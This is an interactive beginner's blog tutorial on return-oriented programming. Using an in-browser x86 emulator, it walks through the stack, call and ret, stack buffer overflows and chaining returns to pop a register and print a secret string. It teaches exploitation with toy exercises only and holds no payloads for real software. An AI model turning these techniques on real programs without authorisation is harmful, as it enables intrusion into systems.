Interactive Beginner's Guide to ROP -- Vetle's HackShack


Return-oriented Programming (ROP) is a binary exploitation technique that leverages exisisting code in the binary in order to execute attacker code.

To follow this post it might be useful to have at least a little understanding of x86 assembly.

As most modern computers running on Intel chips are 64-bit, this guide is also using 64-bits. Note however, that because of limitations of JavaScript and the developer of the emulator, registers can not actually hold 64-bit values and they will be rounded down when too large. If anybody wants to help me with that (without BigInt), that would be really helpful. Emulator repository: http://github.com/bordplate/js86

Note that the interactive demos will not work in Edge and Internet Explorer because the demos use JavaScript-functionality not present in those browsers. Browsers that have been tested to work are Firefox, Safari, Opera and Google Chrome.

Note on endianness: I have chosen to not address that as I feel like it complicates things without much benefit, as such, note that the endianness of the emulator is not correct for Intel x86. If you’d like, you can read more about endianness on Wikipedia.

Stack

In ROP, the stack is an important element because it holds the “return” values that we want to control. But first I want to make sure we have an understanding of how the stack works.

The stack is a memory region at the end of a programs memory space where the program can store short-lived temporary values. Like stacking plates in a cupboard, the last plate you stack on top will be the first one to come off the stack again. In memory, the stack grows from a higher memory address into the lower addresses, so the first value put onto the stack will reside at the highest memory address, while the last value put onto the stack will reside at the lowest memory address. To keep track of where in memory the last value pushed to the stack is, we have the stack pointer, in x86 that’s a register called RSP. RSP will always point to where the next stack value should be put.

Loading emulator...

Note: EAX is the same as RAX, EAX is just the lower 32 bits of RAX. Read more about it here.

Above is a small program that moves the HEX value 0x40414243 into the CPU register RAX and then pushes that value onto the stack. We’re watching all the bytes from memory address 0x24E to 0x255 (so we can see the first 8 bytes of the stack), we’re also watching the stack pointer RSP and the RAX-register.

When you step through it, you will first see that RAX will get the value 0x000040414243, then step again and you will see that RSP changed from value 0x256 to 0x24E and the last bytes in our stack memory region will have changed to 0x40, 0x41, 0x42 and 0x43 (they correspond to ASCII characters @, A, B and C).

Call and return

The register RIP is the instruction pointer, it points to the address of the next instruction that will run. jmp 0x4c instructions can be compared to mov rip, 0x4c, meaning the next instruction that will run is at address 0x4c. call 0x4c on the other hand can be compared to instructions push rip; jmp 0x4c which puts the current value of RIP on the stack before jumping to the specified address. The reason call does this is because there is an opposite of call named ret which can be thought of as pop rip.

Loading emulator...

Note: The int 3-instruction is specific to this emulator and just stops execution at that point.

Above you will see that when we call 0xc, the stack pointer RSP is subtracted by 8 (because 64-bit addresses are 8 bytes) and the byte at memory address 0x255 has changed from 0x00 to 0x0A, which is the address of the instruction after call 0xc. Then when we hit ret, the stack pointer’s value is back to 0x256, we jump to address 0x0A where we hit int 3 which is this emulator’s instruction for shutting down.

Here’s a demonstration of multiple nested calls and returns, and you will see the stack grow and shrink for each call and return, respectively.

Loading emulator...

Sometimes, we’d like to have variables like strings from user-input on our stack, variables we only need temporarily, or just need to manipulate or format before storing more permanently somewhere else in memory. More often than not, a string is larger than what we can hold in one register (8 bytes for 64-bit CPUs, 4 bytes for 32-bit CPUs). Thus, instead of pushing from a register onto the stack, we subtract the amount of space we think we need from RSP and then just directly write to the address of RSP.

Loading emulator...

If you reach int 2 and it does not progress, write something in the black console and hit enter.

In this demonstration you will see that we subtract 16 (0x10) bytes from RSP,which means we now have 16 bytes of stack space to play with. In this emulator we have int 2 which will wait for user input until the first line break (ASCII 0x0a) or up to the amount of characters specified in RSI and place them at the address specified in RDI. In this case RDI will be 0x246, which means int 2 will put the user-input starting at address 0x246. RSI will be 0x10, which means int 2 will read and put a maximum of 16 bytes into the memory address specified in RDI. As we have only allocated 16 bytes of stack space for stack variables, we only want to read 16 bytes of user input so we don’t run out of space if a user enters too much data.

A dangerous situation arises when user input can exceed the space we allocated for the variable.

Loading emulator...

Above you will see that you have ability to control what will be poped into RAX, if you carefully craft the input.

Controlling the instruction pointer

With this principle we can also control RIP as long as we can overwrite a value that would be poped into it. As you know, a ret instruction does exactly that when returning from a call.

Loading emulator...

Above is a program that is vulnerable to a stack buffer overflow where you will be able to divert program execution to your own choosing. To input raw bytes prepend \x to the byte you want, so \x00 is null, \x0a is newline (or 10 in decimal). The goal here is to get to address 0x0000000000000020 where 0x12345678 is moved into EAX.

I can recommend this CyberChef recipe for easily turning HEX into C-style byte literals for use when creating your payload.

Function arguments

Function arguments are an important part of programming, and exactly how function arguments are passed to a function differs from platform to platform depending on CPU architecture and bitness. You can more read about calling conventions on Wikipedia, they’ve got it well covered.

Loading emulator...

Above is a program that moves the value 0xE into RDI, this is the address of a string loaded in memory. Then we call int 1 which is a print sort of function that takes its 1 argument in RDI. That means that if we could control the value of RDI somehow, then we could also control what is printed when int 1 is called.

Controlling RIP and RDI to print a secret string

Now we should have enough pieces to puzzle together a longer exploit chain. In the next demo, you will have to chain together multiple returns in order to pop rdi with the value of the secret string and then ret to int 1 so that it prints out whatever is at the address of RDI.

Loading emulator...

The secret string is at address 0x55.

One of the tricky parts here is to figure out where in your input the return values and arguments should be. Just remember your end goal, print the string at address 0x55. Your steps should look similar to this:

  • pop rdi with value 0x0000000000000055.
  • ret to address 0x0000000000000039 to print the string at the address specified in RDI.

As an additional challenge, after you have printed the secret string, try to also get the program to exit cleanly by calling int 3.

I can recommend this CyberChef recipe for easily turning HEX into C-style byte literals for use when creating your payload.

Check out the emulator code on GitHub.

I’d love some feedback over at Twitter: @bordplate.

If you’re looking for a job, consider coming to work with me in Norway.